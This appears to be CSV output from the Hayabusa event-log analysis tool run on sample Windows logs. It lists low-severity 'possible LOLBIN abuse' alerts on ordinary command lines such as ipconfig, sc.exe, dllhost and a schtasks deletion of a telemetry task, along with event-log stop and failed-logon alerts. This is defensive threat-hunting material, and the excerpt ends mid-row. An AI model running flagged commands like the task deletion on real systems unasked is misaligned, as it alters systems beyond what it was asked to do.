Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 07:57:39.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 08:03:14.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 08:03:14.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:04.123 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:05.218 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:05.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:05.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:15.400 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 22:32:23.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 23:37:56.230 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 23:37:59.307 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 23:39:22.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 23:39:28.137 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-05 00:10:41.119 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-05 00:10:41.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 11:13:20.120 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 11:13:20.122 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 11:13:21.221 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 11:13:21.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 11:13:30.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 12:28:48.887 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 12:28:49.170 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 23:50:16.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 23:50:16.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 23:50:25.279 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer 
Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 00:01:09.025 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 00:01:09.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 05:09:57.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 05:09:57.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 05:28:03.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 05:28:03.894 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:53:42.990 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:53:44.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:53:44.490 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:53:53.459 +09:00,IE10Win7,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:56:17.454 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:56:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:46.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 07:56:47.806 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:56:48.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe 
/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:57:01.618 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:57:01.696 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:57:03.862 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:57:04.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:57:05.547 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 08:05:28.818 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 08:05:29.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:56:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:56:53.723 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 
23:56:53.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:56:55.848 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:57:03.208 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x978 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:57:32.774 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:57:36.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:09:39.097 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:09:42.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:10:22.816 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:10:26.441 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:12:04.478 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: 
C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:12:15.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:03.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public 